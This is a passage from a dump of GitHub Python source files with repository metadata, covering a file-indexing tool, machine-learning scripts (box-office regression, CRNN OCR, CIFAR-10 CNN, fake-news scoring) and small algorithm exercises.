**kwargs)\n\n\n\n\n\n\n\n\n\n","repo_name":"alexmzirai/DjangoBot","sub_path":"djangobot/bot/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13145252900","text":"#!/usr/bin/python3\n\"\"\"Example to read a file text.\"\"\"\n\n#with open('text_files/pi_digits.txt') as file_object:\n #contents = file_object.read()\n #print(contents.rstrip())\n\n# Absolute file path\n#file_path = '/home/humberto/Documents/Repositories/practices/python/PythonCrashCourse/PartI/Chapter10/text_files/pi_digits.txt'\n# Relative file path\nfile_path = 'text_files/pi_digits.txt'\n\n#with open(file_path) as file_object:\n #contents = file_object.read()\n #print(contents.rstrip())\n\n#with open(file_path) as file_object:\n #for line in file_object:\n #print(line.rstrip())\n\nwith open(file_path) as file_object:\n lines = file_object.readlines()\n\nfor line in lines:\n print(line.rstrip())\n","repo_name":"humbertoperdomo/practices","sub_path":"python/PythonCrashCourse/PartI/Chapter10/file_reader.py","file_name":"file_reader.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23575456211","text":"\"\"\"Index of files in a directory structure.\"\"\"\nimport collections\nimport contextlib\nimport logging\nimport pathlib\nimport sqlite3\nimport typing as t\n\nimport click\nimport tqdm\n\nfrom findex.db import Storage, opened_storage\nfrom findex.fs import FileDesc, FILEHASH_WALK_ERROR, count_files, walk\n\nMETA_ROOT_SPECIFIED = \"ROOT_SPECIFIED\"\nMETA_ROOT_RESOLVED = \"ROOT_RESOLVED\"\n\n_logger = logging.getLogger(__name__)\n\n\nclass Index(Storage):\n \"\"\"Index of file path by content, based on sqlite.\"\"\"\n\n def create(self, path: pathlib.Path):\n \"\"\"Create index of given directory.\"\"\"\n\n _logger.info(f\"Creating index of {path}.\")\n self.create_db()\n errors = []\n\n def _on_error(error: OSError):\n _logger.warning(error)\n errors.append(\n FileDesc(\n path=str(pathlib.Path(error.filename).relative_to(path)),\n size=0,\n fhash=FILEHASH_WALK_ERROR.format(message=error.strerror),\n created=None,\n modified=None,\n )\n )\n\n click.echo(f\"Counting files in {path}...\")\n count = count_files(path, _on_error)\n\n with opened_storage(self):\n self._put_meta(META_ROOT_SPECIFIED, str(path))\n self._put_meta(META_ROOT_RESOLVED, str(path.resolve()))\n\n _logger.debug(f\"Writing {len(errors)} walk errors to database.\")\n for errordesc in errors:\n self._add_file(errordesc)\n\n _logger.info(f\"Found {count} files to be added to index.\")\n for filedesc in tqdm.tqdm(\n walk(path), total=count, desc=\"Read\", unit=\"files\"\n ):\n self._add_file(filedesc)\n self._on_update()\n\n def _add_file(self, filedesc: FileDesc):\n try:\n self.connection.execute(\n \"INSERT INTO file (path,size,hash,created,modified)\"\n \" VALUES (?,?,?,datetime(?),datetime(?));\",\n filedesc,\n )\n except sqlite3.OperationalError:\n _logger.error(f\"Cannot add file to database: {filedesc}\")\n raise\n\n def count(self):\n with opened_storage(self):\n return self.connection.execute(\"SELECT COUNT(*) from file\").fetchone()[0]\n\n def iter_all(self):\n with opened_storage(self):\n with contextlib.closing(self.connection.cursor()) as cursor:\n for row in cursor.execute(\n \"SELECT path,size,hash,created,modified from file\"\n ):\n yield FileDesc._make(row)\n\n\nFilesMap = collections.namedtuple(\"FilesMap\", \"fhash size files1 files2\")\n\"\"\"Files in comparison with identical content hash.\"\"\"\n\n\nclass Comparison(Storage):\n \"\"\"Comparison of two index databases.\"\"\"\n\n def create(self, index1: Index, index2: Index):\n \"\"\"Create comparison of two file index files.\"\"\"\n\n _logger.info(f\"Creating comparison {self.path}.\")\n\n self.create_db()\n\n with opened_storage(self):\n click.echo(f\"\\nAdding data from {index1.path}.\")\n self._add_index(index1, \"1\")\n click.echo(f\"\\nAdding data from {index2.path}.\")\n self._add_index(index2, \"2\")\n\n def _add_index(self, index: Index, table_suffix: str):\n for file in tqdm.tqdm(index.iter_all(), total=index.count(), unit=\"files\"):\n self._add_file(file, f\"file{table_suffix}\")\n self._on_update()\n\n # copy meta data of index:\n for key, value in index.iter_meta():\n self._put_meta(self._index_key(key, table_suffix), value)\n\n @staticmethod\n def _index_key(key: str, table_suffix: str) -> str:\n return f\"INDEX{table_suffix}_{key}\"\n\n def get_index_meta(self, key: str, table_suffix: str) -> t.Optional[str]:\n return self.get_meta(self._index_key(key, table_suffix))\n\n def _add_file(self, filedesc: FileDesc, table: str):\n try:\n self.connection.execute(\n f\"INSERT INTO {table} (path,size,hash,created,modified)\"\n f\" VALUES (?,?,?,datetime(?),datetime(?));\",\n filedesc,\n )\n except sqlite3.OperationalError:\n _logger.error(f\"Cannot add file to database: {filedesc}\")\n raise\n\n def _iter_exclusive_files(\n self, table_contained, table_not_contained, *, include_updated=False\n ):\n \"\"\"Return files only in table_contained, but not in table_not_contained.\"\"\"\n assert table_contained != table_not_contained\n\n if include_updated:\n excluded_paths = {}\n else:\n excluded_paths = {f.path for f in self.iter_updated()}\n\n with opened_storage(self):\n with contextlib.closing(self.connection.cursor()) as cursor:\n for row in cursor.execute(\n f\"SELECT \"\n f\" {table_contained}.path,\"\n f\" {table_contained}.size,\"\n f\" {table_contained}.hash,\"\n f\" {table_contained}.created,\"\n f\" {table_contained}.modified \"\n f\"FROM {table_contained} LEFT OUTER JOIN {table_not_contained} \"\n f\" ON {table_contained}.hash = {table_not_contained}.hash \"\n f\"WHERE {table_not_contained}.hash IS NULL \"\n f\"ORDER BY {table_contained}.path\"\n ):\n file = FileDesc._make(row)\n\n if file.path not in excluded_paths:\n yield file\n\n def iter_missing(self, *, include_updated=False):\n \"\"\"Return files only in index 1, but not in 2.\"\"\"\n return self._iter_exclusive_files(\n \"file1\", \"file2\", include_updated=include_updated\n )\n\n def iter_new(self, *, include_updated=False):\n \"\"\"Return files only in index 2, but not in 1.\"\"\"\n return self._iter_exclusive_files(\n \"file2\", \"file1\", include_updated=include_updated\n )\n\n def iter_updated(self):\n \"\"\"Return files that have an identical path but different hashes.\"\"\"\n with opened_storage(self):\n with contextlib.closing(self.connection.cursor()) as cursor:\n for row in cursor.execute(\n \"SELECT \"\n \" file1.path,\"\n \" file1.size,\"\n \" file1.hash,\"\n \" file1.created,\"\n \" file1.modified \"\n \"FROM file1 JOIN file2 \"\n \" ON file1.path = file2.path \"\n \"WHERE file1.hash != file2.hash \"\n \"ORDER BY file1.path\"\n ):\n yield FileDesc._make(row)\n\n def iter_content_groups(self):\n \"\"\"Return list of pairs of paths in index 1 and index 2 that have identical content.\n\n In case of duplicates in an index, there is possibly more than one file in each of the\n pairs' elements.\n \"\"\"\n with opened_storage(self):\n with contextlib.closing(self.connection.cursor()) as cursor:\n for row in cursor.execute(\n \"SELECT \"\n \" file1.hash,\"\n \" file1.size,\"\n \" group_concat(DISTINCT file1.path) AS files1,\"\n \" group_concat(DISTINCT file2.path) AS files2 \"\n \"FROM file1 JOIN file2 \"\n \" ON file1.hash == file2.hash \"\n \"GROUP BY file1.hash,file1.size \"\n \"ORDER BY files1\"\n ):\n fmap = FilesMap._make(row)\n\n # unpack CSV fields:\n yield fmap._replace(\n files1=fmap.files1.split(\",\"), files2=fmap.files2.split(\",\")\n )\n\n def report_raw(self):\n click.echo()\n click.secho(\"Missing files:\", underline=True, bold=True, fg=\"bright_cyan\")\n click.echo(\"\\n\".join(f.path for f in self.iter_missing()))\n\n click.echo()\n click.secho(\"New files:\", underline=True, bold=True, fg=\"bright_cyan\")\n click.echo(\"\\n\".join(f.path for f in self.iter_new()))\n\n click.echo()\n click.secho(\"Updated files:\", underline=True, bold=True, fg=\"bright_cyan\")\n click.echo(\"\\n\".join(f.path for f in self.iter_updated()))\n\n click.echo()\n click.secho(\"Identical files:\", underline=True, bold=True, fg=\"bright_cyan\")\n num_groups = sum(1 for _ in self.iter_content_groups())\n click.echo(f\"{num_groups} groups with identical content in both indices.\")\n","repo_name":"moltob/findex","sub_path":"findex/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":8667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28912203873","text":"from typing import Optional\nfrom list_node import ListNode\n\nclass Solution:\n def removeNthFromEnd(self, head: Optional[ListNode], n: int) -> Optional[ListNode]:\n if not head or not head.next:\n return None\n\n left, right = head, head\n\n while n > 0:\n right = right.next\n n -= 1\n\n prev_left = None\n\n while right is not None:\n prev_left = left\n left = left.next\n right = right.next\n\n next_left = left.next\n if prev_left is None:\n head = next_left\n else:\n prev_left.next = next_left\n\n return head\n","repo_name":"ysakiyev/31github","sub_path":"neetcode_150/linked_lists/19_remove_nth_node_from_end.py","file_name":"19_remove_nth_node_from_end.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12022775168","text":"#imports\n\nimport numpy as np\nimport pandas as pd\n\nfrom collections import Counter\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import mean_squared_log_error\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.neural_network import MLPRegressor\nfrom sklearn.ensemble import BaggingRegressor, AdaBoostRegressor, ExtraTreesRegressor, RandomForestRegressor\nfrom sklearn.decomposition import PCA\nfrom sklearn.feature_selection import SelectKBest, f_classif\nfrom sklearn.preprocessing import MinMaxScaler, StandardScaler\nfrom sklearn.metrics import confusion_matrix, cohen_kappa_score, classification_report\nfrom sklearn.model_selection import cross_val_score\n\nimport ast\n\nimport plotly\nimport plotly.plotly as py\nimport plotly.graph_objs as go\n\nimport matplotlib.pyplot as plt\n\n# reading the csv \n\n\nboxoffice_df = pd.read_csv('train.csv', index_col=None)\n\ndict_columns = ['genres']\n\ndef text_to_dict(df):\n for column in dict_columns:\n df[column] = df[column].apply(lambda x: {} if pd.isna(x) else ast.literal_eval(x) )\n return df\n\nboxoffice_df = text_to_dict(boxoffice_df)\n#pre-analisis\n\nprint(boxoffice_df.head(10))\nprint(boxoffice_df.dtypes)\n\n#genre filling\nfor i, e in enumerate(boxoffice_df['genres'][:5]):\n print(i, e)\n \nlist_of_genres = list(boxoffice_df['genres'].apply(lambda x: [i['name'] for i in x] if x != {} else []).values)\nprint(Counter([i for j in list_of_genres for i in j]).most_common())\n\nboxoffice_df['num_genres'] = boxoffice_df['genres'].apply(lambda x: len(x) if x != {} else 0)\nboxoffice_df['all_genres'] = boxoffice_df['genres'].apply(lambda x: ' '.join(sorted([i['name'] for i in x])) if x != {} else '')\ntop_genres = [m[0] for m in Counter([i for j in list_of_genres for i in j]).most_common(15)]\nfor g in top_genres:\n boxoffice_df['genre_' + g] = boxoffice_df['all_genres'].apply(lambda x: 1 if g in x else 0)\n \nboxoffice_df = boxoffice_df.drop(['genres'], axis=1)\n\n#outliers\n\nbudget_data = boxoffice_df['budget']\npopularity_data = boxoffice_df['popularity']\n# plt.boxplot(popularity_data)\n# plt.show()\n\nbudget_upper_limit = 200000000\npopularity_upper_limit = 75\n\npopularity_data.loc[boxoffice_df['popularity']>popularity_upper_limit] = popularity_upper_limit\nbudget_data.loc[boxoffice_df['budget']>budget_upper_limit] = budget_upper_limit\n\n# plt.boxplot(popularity_data)\n# plt.show()\n\n# print(\"Number of genres in films:\")\n# print(boxoffice_df['genres'].apply(lambda x: len(x) if x != {} else 0).value_counts())\n\n\n#data preparation\n\n\nprocessed_df = boxoffice_df.drop(['belongs_to_collection','homepage','overview','poster_path','production_companies','imdb_id',\n 'spoken_languages','production_countries','tagline','Keywords','cast','crew'],axis=1)\n\n# filling missing atributes\n\nprocessed_df.runtime.fillna(value=processed_df.runtime.mean(),inplace=True)\nprint(processed_df.dtypes)\nprint(processed_df.apply(lambda x: x.isnull().any()))\n\n\nprint(processed_df.head(10))\n\n#strings to categorical features\nprocessed_df['original_language'] = processed_df.original_language.astype('category')\nprocessed_df['original_title'] = processed_df.original_title.astype('category')\nprocessed_df['release_date'] = processed_df.release_date.astype('category')\nprocessed_df['status'] = processed_df.status.astype('category')\nprocessed_df['title'] = processed_df.title.astype('category')\nprocessed_df['all_genres'] = processed_df.all_genres.astype('category')\n\nprocessed_df['original_language'] = pd.get_dummies(processed_df['original_language'])\nprocessed_df['original_title'] = pd.get_dummies(processed_df['original_title'])\nprocessed_df['release_date'] = pd.get_dummies(processed_df['release_date'])\nprocessed_df['status'] = pd.get_dummies(processed_df['status'])\nprocessed_df['title'] = pd.get_dummies(processed_df['title'])\nprocessed_df['all_genres'] = pd.get_dummies(processed_df['all_genres'])\n\n\n# separate class from features\ndata_features = processed_df.drop(['revenue'],axis=1).values\ndata_labels = processed_df['revenue'].values\n\n\n\n#pca \n\n\npca = PCA(n_components=4)\nfit = pca.fit(data_features)\nprint(\"Explained Variance:\")\nprint(fit.explained_variance_ratio_)\nprint(fit.components_)\n\n#univariate selection \n# test = SelectKBest(score_func=f_classif,k=4)\n# fit = test.fit(data_features,data_labels)\n# np.set_printoptions(precision=3)\n# print(fit.scores_)\n# features = fit.transform(data_features)\n# print(features[0:10])\n\n#min_max\n\nscaler = MinMaxScaler()\nscaler.fit(data_features)\nfeatures = scaler.fit_transform(data_features)\n\n#standard\nscaler = StandardScaler()\nfeatures = scaler.fit_transform(data_features)\n\n\nX_train, X_test, Y_train, Y_test = train_test_split(features, data_labels, test_size=0.3)\n#decision tree \n\nclf = DecisionTreeRegressor(max_depth=5,max_features=1)\n\nclf.fit(X_train,Y_train)\n\nscore = clf.score(X_test,Y_test)\n\nprint(score)\n\ny_pred = clf.predict(X_test)\n\n\n\nnames = [\"Decision Tree Regressor\", \"MLP Regressor\", \"Random Forest Regressor\", \"AdaBoost\", \"Bagging Regressor\",\"Extra Trees Regressor\"]\n\nclassifiers = [\n DecisionTreeRegressor(max_depth=5,max_features=1),\n MLPRegressor(alpha=1,max_iter=200,power_t=0.9,batch_size=50),\n RandomForestRegressor(max_depth=5, max_features=1, n_estimators=10),\n AdaBoostRegressor(n_estimators=10),\n BaggingRegressor(max_features=1,n_estimators=10,base_estimator=clf),\n ExtraTreesRegressor(max_depth=5)\n]\n\nfor name, clf in zip(names, classifiers):\n clf.fit(X_train,Y_train)\n score = clf.score(X_test,Y_test)\n y_pred = clf.predict(X_test)\n print(name+\": \"+str(score))\n mse = mean_squared_log_error(Y_test,y_pred)\n print('MSE: %.4f' % mse)\n # print(confusion_matrix(Y_test,y_pred,labels=None))\n # print(cohen_kappa_score(Y_test,y_pred, labels=None))\n # print(classification_report(Y_test,y_pred,labels=None))","repo_name":"Chriscalde/EvidenciasCursoAIULSA2019_4501","sub_path":"tmdb-box-office-prediction/boxoffice.py","file_name":"boxoffice.py","file_ext":"py","file_size_in_byte":5826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14233113280","text":"# Uses python3\nimport sys\n\ndef binary_search(a, x):\n left = 0\n right = len(a) - 1\n\n def search(left, right, a, x):\n n = right - left\n\n if n == 0:\n return left if a[left] == x else -1 \n\n mid = left + n//2\n\n if a[mid] >= x:\n return search(left, mid, a, x)\n else:\n return search(mid + 1, right, a, x)\n\n return search(left, right, a, x)\n\n\ndef linear_search(a, x):\n for i in range(len(a)):\n if a[i] == x:\n return i\n return -1\n\nif __name__ == '__main__':\n input = sys.stdin.read()\n data = list(map(int, input.split()))\n n = data[0]\n m = data[n + 1]\n a = data[1 : n + 1]\n for x in data[n + 2:]:\n # replace with the call to binary_search when implemented\n #print(linear_search(a, x), end = ' ')\n print(binary_search(a, x), end = ' ')\n","repo_name":"mcgaw/psychic-garbanzo","sub_path":"1/week4/binary_search/binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74029995252","text":"from datetime import datetime\nfrom logging import getLogger\n\nfrom mr_owlf_mls.repository.author import AuthorRepository\nfrom mr_owlf_mls.repository.domain import DomainRepository\nfrom mr_owlf_mls.service.translator import translate\nfrom mr_owlf_mls.util.data import clean\nfrom pandas import DataFrame\nfrom pymongo.database import Database\n\nFAKE = 'FAKE'\nNOT_FAKE = 'NOT_FAKE'\n\n\nclass Process:\n \"\"\"\n This class is responsible to calculate your data score.\n \"\"\"\n\n def __init__(self, clf: any, vectorizer: any, db: Database):\n \"\"\"\n Default constructor.\n :param clf: Classifier\n :param vectorizer: Vectorizer\n :param db: Database Connection Instance\n \"\"\"\n self.log = getLogger('root')\n self.clf = clf\n self.vectorizer = vectorizer\n self.author_repository = AuthorRepository(db)\n self.domain_repository = DomainRepository(db)\n\n def run(self, **kwargs) -> float:\n \"\"\"\n Calculate news score.\n If no arguments are passed it will return \"0.0\" as score.\n :param kwargs: Optional arguments to calculate data score.\n sentence (str): News sentence\n author (str): Author(s) name(s)\n domain (str): News domain\n publish_date (str): The UTC date that it was published [YYYY-MM-DD]\n :return: Score\n \"\"\"\n self.log.info(f'SCORE # Calculating score...')\n score = 0.0\n if len(kwargs) == 0:\n return score\n\n if 'sentence' in kwargs:\n score = score + (self.sentence_score(kwargs.get('sentence')) * 6.5)\n\n if 'author' in kwargs:\n score = score + (self.author_score(kwargs.get('author')) * 1.25)\n\n if 'domain' in kwargs:\n score = score + (self.domain_score(kwargs.get('domain')) * 1.25)\n\n if 'publish_date' in kwargs:\n score = score + (self.publish_date_score(kwargs.get('publish_date')) * 1.0)\n\n score = float(score / 10)\n self.log.info(f'SCORE # \"{score}\"\\n')\n return score\n\n def sentence_score(self, sentence: str) -> float:\n if sentence is None or sentence.strip() == '':\n return 0.0\n\n data = DataFrame({'content': [clean(translate(sentence))]})\n data_cvec = self.vectorizer.transform(data['content'])\n preds_prob = self.clf.predict_proba(data_cvec)\n\n fake = '{0:.2f}'.format(preds_prob[0][0])\n not_fake = '{0:.2f}'.format(preds_prob[0][1])\n self.log.info(f'SENTENCE # Prob. to be true \"{not_fake}\" (false \"{fake}\")')\n\n return float(preds_prob[0][1])\n\n def author_score(self, author_name: str) -> float:\n if author_name is None or author_name.strip() == '':\n return 0.0\n\n author = self.author_repository.find(author_name.lower().strip())\n if author is None or 'classification' not in author:\n return 0.0\n\n clf = author['classification']\n good = int(clf[NOT_FAKE]) if NOT_FAKE in clf else 0\n bad = int(clf[FAKE]) if FAKE in clf else 0\n total = good + bad\n score = 5.0 if total == 0 else float(good / total)\n\n self.log.info(f'AUTHOR # \"{author_name}\" score is \"{score}\"')\n return score\n\n def domain_score(self, domain_name: str) -> float:\n if domain_name is None or domain_name.strip() == '':\n return 0.0\n\n domain = self.domain_repository.find(domain_name.lower().strip())\n if domain is None or 'classification' not in domain:\n return 0.0\n\n clf = domain['classification']\n good = int(clf[NOT_FAKE]) if NOT_FAKE in clf else 0\n bad = int(clf[FAKE]) if FAKE in clf else 0\n total = good + bad\n score = 5.0 if total == 0 else float(good / total)\n\n self.log.info(f'DOMAIN # \"{domain_name}\" score is \"{score}\"')\n return score\n\n def publish_date_score(self, publish_date: str) -> float:\n if publish_date is None or publish_date.strip() == '':\n return 0.0\n\n score = -1.0\n try:\n date = datetime.strptime(publish_date, '%Y-%m-%d').date()\n now = datetime.date(datetime.utcnow())\n if date < now:\n score = 1.0\n except ValueError as ex:\n self.log.warning(f'PUBLISH DATE # \"{publish_date}\" is not a valid date! Message: {ex}')\n\n self.log.info(f'PUBLISH DATE # \"{publish_date}\" score is \"{score}\"')\n return score\n","repo_name":"avcaliani/mr-owlf","sub_path":"mr-owlf-mls/mr_owlf_mls/service/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":4509,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"14219918830","text":"\nimport yaml\nimport numpy as np\nimport tensorflow as tf\nimport keras\nfrom keras import layers\nfrom keras.layers import Conv2D, Input, MaxPooling2D\nfrom keras.layers import Bidirectional, LSTM, Dense\nfrom keras.layers import BatchNormalization, Bidirectional, Activation, Dropout, Reshape, Lambda\nfrom keras.models import Model\nfrom keras.utils import plot_model\nfrom keras import backend as K \n\nconfig_path = \"./conf/conf.yaml\"\n\ndef ctc_lambda_func(args):\n y_pred, labels, input_length, label_length = args\n # the 2 is critical here since the first couple outputs of the RNN\n # tend to be garbage:\n y_pred = y_pred[2:, :]\n return K.ctc_batch_cost(labels, y_pred, input_length, label_length)\n\nclass CRNN:\n\n def __init__(self, input_shapes, class_num=37):\n \n self.config = self.get_Config()\n self.input_shapes = input_shapes\n self.class_num = class_num\n self.CNN_layer = self.make_CNN()\n self.RNN_layer = self.make_RNN()\n self.CRNN_model = self.create_model()\n\n def get_Config(self):\n with open(config_path, \"r\") as stream:\n conf = yaml.load(stream, Loader=yaml.FullLoader)\n return conf[\"model\"]\n\n # create CNN\n def make_CNN(self):\n CNN_CONFIG = self.config[\"CNN\"]\n #print(CNN_CONFIG)\n \n layers = [\"L1\", \"L2\", \"M\", \"L3\", \"L4\", \"C\", \"L5\", \"L6\", \"L7\", \"C\", \"L8\", \"L9\", \"C\", \"M\", \"L10\", \"L11\", \"L12\", \"M\"]\n \n input_shapes = self.input_shapes\n inputs = Input(shape=input_shapes, name=\"CNN_inputs\")\n\n inner = Conv2D(filters=CNN_CONFIG[\"L1\"][\"filters\"], kernel_size=(CNN_CONFIG[\"L1\"][\"kernels\"], CNN_CONFIG[\"L1\"][\"kernels\"]),\n padding=CNN_CONFIG[\"L1\"][\"padding\"])(inputs)\n inner = BatchNormalization()(inner)\n inner = Activation(CNN_CONFIG[\"L1\"][\"activation\"])(inner)\n\n for _, layer in enumerate(layers[1:], 1):\n if layer == \"M\":\n inner = MaxPooling2D(pool_size=(2, 2), strides=2)(inner)\n elif layer == \"C\":\n inner = MaxPooling2D(pool_size=(2, 2), strides=(2, 1))(inner)\n else:\n inner = Conv2D(filters=CNN_CONFIG[layer][\"filters\"], kernel_size=(CNN_CONFIG[layer][\"kernels\"], CNN_CONFIG[layer][\"kernels\"]),\n padding=CNN_CONFIG[layer][\"padding\"])(inner)\n inner = BatchNormalization()(inner)\n inner = Activation(CNN_CONFIG[layer][\"activation\"])(inner)\n\n model = Model(inputs, inner)\n #plot_model(model, to_file='CNN.png', show_shapes=True)\n return model\n\n def make_RNN(self):\n input_shapes = K.int_shape(self.CNN_layer.layers[-1].output)\n input_shapes = input_shapes[2:]\n #print(\"RNN input shapes = \", input_shapes)\n\n inputs = Input(shape=input_shapes, name=\"RNN_input\")\n inner = Bidirectional(LSTM(units=128, return_sequences=True, dropout=0.3))(inputs)\n inner = Bidirectional(LSTM(units=64, return_sequences=True, dropout=0.3))(inner)\n inner = Dropout(rate=0.25)(inner)\n inner = Dense(units=self.class_num)(inner)\n outputs = Activation('softmax')(inner)\n\n model = Model(inputs, outputs)\n #plot_model(model, to_file='RNN.png', show_shapes=True)\n return model\n\n def create_model(self):\n inputs = Input(shape=self.input_shapes, name='CRNN_input')\n\n x = inputs\n for i in range(1, len(self.CNN_layer.layers)):\n x = self.CNN_layer.layers[i](x)\n rnn_input_shapes = np.shape(x)[2:]\n x = Reshape((rnn_input_shapes[0], rnn_input_shapes[1]))(x)\n for j in range(1, len(self.RNN_layer.layers)):\n x = self.RNN_layer.layers[j](x)\n \n outputs = x\n\n labels = Input(shape=(4, 37), name=\"label\", dtype=\"float32\")\n input_length = Input(name='input_length', shape=[1], dtype='int64')\n label_length = Input(name='label_length', shape=[1], dtype='int64')\n\n loss_out = Lambda(ctc_lambda_func, output_shape=(1,), name='ctc')([outputs, labels, input_length, label_length])\n \n crnn_model = Model([inputs, labels, input_length, label_length], loss_out)\n \n plot_model(crnn_model, to_file='CRNN.png', show_shapes=True)\n\n return crnn_model\n\n\n\"\"\" for test \"\"\"\n\"\"\"\ninput_shapes = (64, 128, 3)\nmodel = CRNN(input_shapes).CRNN_model\nmodel.summary()\n\"\"\"\n\n","repo_name":"Huang-Ray/OCR-KERAS","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12759816251","text":"class Solution:\n def bob_helper(self, cur_arrows, cur_index, ans):\n if cur_index == len(self.aliceArrows):\n if cur_arrows > 0:\n ans[1][0] += cur_arrows\n return ans\n \n score, res_arr = ans[0], ans[1].copy()\n res = self.bob_helper(cur_arrows, cur_index+1, (score, res_arr) )\n \n \n arrow_cost = self.aliceArrows[cur_index] + 1\n new_arrow = cur_arrows - arrow_cost\n \n if new_arrow >= 0: \n \n score, res_arr = ans[0], ans[1].copy()\n score += cur_index\n res_arr[cur_index] = arrow_cost \n \n res_taken = self.bob_helper(new_arrow, cur_index+1,(score, res_arr) )\n \n res = res if res[0] > res_taken[0] else res_taken\n \n return res \n \n def maximumBobPoints(self, numArrows: int, aliceArrows: List[int]) -> List[int]:\n \n self.aliceArrows = aliceArrows\n ans = ( 0, [0]*len(aliceArrows) )\n res = self.bob_helper(numArrows, 0, ans)\n \n return res[1]\n","repo_name":"YohansHailu/competitive_programming","sub_path":"daynamic_programing/Maximum_Points_in_an_Archery_Competition.py","file_name":"Maximum_Points_in_an_Archery_Competition.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41805209610","text":"import pandas as pd\n\n\ndef make_spectrum():\n \"\"\"Make an artificial spectrum using the lines from NIST\n \"\"\"\n # Load the list of peaks\n df = pd.read_csv('persistent_lines.csv')\n\n print(df.head())\n\n\nif __name__ == \"__main__\":\n make_spectrum()\n","repo_name":"piovere/backprop","sub_path":"data/atoms/spectra.py","file_name":"spectra.py","file_ext":"py","file_size_in_byte":257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22702067095","text":"colls = int(input(\"Введите колличество столбцов: \"))\nprint(f\"Колличество элементов == {colls*2}\")\nfirtststring = [] # −1 2 5 10 20\nsecondstring = [] # 0.1 0.2 0.3 0.3 0.1\nMathematicalExpectation = []\nSquaredFirstString = []\nDispercyMultiplier = []\ndef Frac(i):\n try:\n return float(i)\n except ValueError:\n n, d = i.split('/')\n return float(n)/float(d)\nfor i in range(0, colls):\n firtststring.insert(i, Frac(input(\"1 : \")))\nfor i in range(0, colls):\n secondstring.insert(i, Frac(input(\"2 : \")))\nprint()\nprint(\"=\"*30)\nprint()\nfor i in range(0, len(firtststring)):\n print(f\" : {firtststring[i]} * {secondstring[i]} = {firtststring[i]*secondstring[i]}\")\n MathematicalExpectation.insert(i, float(firtststring[i]*secondstring[i]))\nMathematicalExpectation = sum(MathematicalExpectation)\nprint()\nprint(f\"Мат.Ожидание == {MathematicalExpectation}\")\nprint()\nfor i in range(0, colls):\n print(f\" : {firtststring[i]}^2 * {secondstring[i]} = {firtststring[i]**2 * secondstring[i]}\")\n SquaredFirstString.insert(i, firtststring[i]**2 * secondstring[i])\nSquaredFirstString = sum(SquaredFirstString)\nprint()\nprint(f\" : {SquaredFirstString} - {MathematicalExpectation}^2 == {SquaredFirstString - MathematicalExpectation**2}\")\nprint()\nprint(f\"Квадратичное Мат.Ожидание == {SquaredFirstString}\")\nprint(f\"Дисперсия == {SquaredFirstString - MathematicalExpectation**2}\")","repo_name":"L0w1y/DispersionAndMathExpectationSearcher","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21736486127","text":"'''\nLink to dataset used in the task: https://www.cs.toronto.edu/~kriz/cifar.html\n\nSetup instructions:\n1. Import/Install all the required libraries from Step1 (if they are highlighted with red colour, they should\nstill work after they are installed)\n2. Run the program\nSzymon Kuczyński s22466\n'''\n\nimport tensorflow as tf\nfrom tensorflow.keras.datasets import cifar10\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D, Flatten, Dense, Dropout\nfrom sklearn.metrics import confusion_matrix\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n'''Load CIFAR-10 Dataset: Loads the CIFAR-10 dataset using cifar10.load_data() function and assigns training and \ntesting images along with their respective labels to variables train_images, train_labels, test_images, and test_labels.'''\n(train_images, train_labels), (test_images, test_labels) = cifar10.load_data()\n\n'''Normalize Pixel Values: Scales pixel values in the images to a range between 0 and 1 by dividing train_images \nand test_images by 255.0.'''\ntrain_images, test_images = train_images / 255.0, test_images / 255.0\n\n'''Initialize Sequential Model: Creates a sequential model using Keras, which allows linear stacking of layers.\nAdd Convolutional Layers: Adds convolutional layers (Conv2D) with specific parameters:\nFirst convolutional layer: 32 filters of size (3, 3) using ReLU activation, accepting input images of shape (32, 32, 3) \n(height, width, channels).\nFirst max-pooling layer (MaxPooling2D) with a pool size of (2, 2).\nSecond convolutional layer: 64 filters of size (3, 3) using ReLU activation.\nSecond max-pooling layer with a pool size of (2, 2).\nThird convolutional layer: 64 filters of size (3, 3) using ReLU activation.\nFlatten and Dense Layers: Flattens the output from the convolutional layers into a 1D array and adds dense layers \n(Dense) with specific activations:\nDense layer with 64 neurons using ReLU activation.\nDropout layer (Dropout) with a dropout rate of 0.5 to prevent overfitting.\nOutput dense layer with 10 neurons using the softmax activation for multi-class classification (CIFAR-10 has 10 classes).'''\nmodel = Sequential([\n Conv2D(32, (3, 3), activation='relu', input_shape=(32, 32, 3)),\n MaxPooling2D((2, 2)),\n Conv2D(64, (3, 3), activation='relu'),\n MaxPooling2D((2, 2)),\n Conv2D(64, (3, 3), activation='relu'),\n Flatten(),\n Dense(64, activation='relu'),\n Dropout(0.5),\n Dense(10, activation='softmax')\n])\n\n'''Compile the Model: Configures the model for training 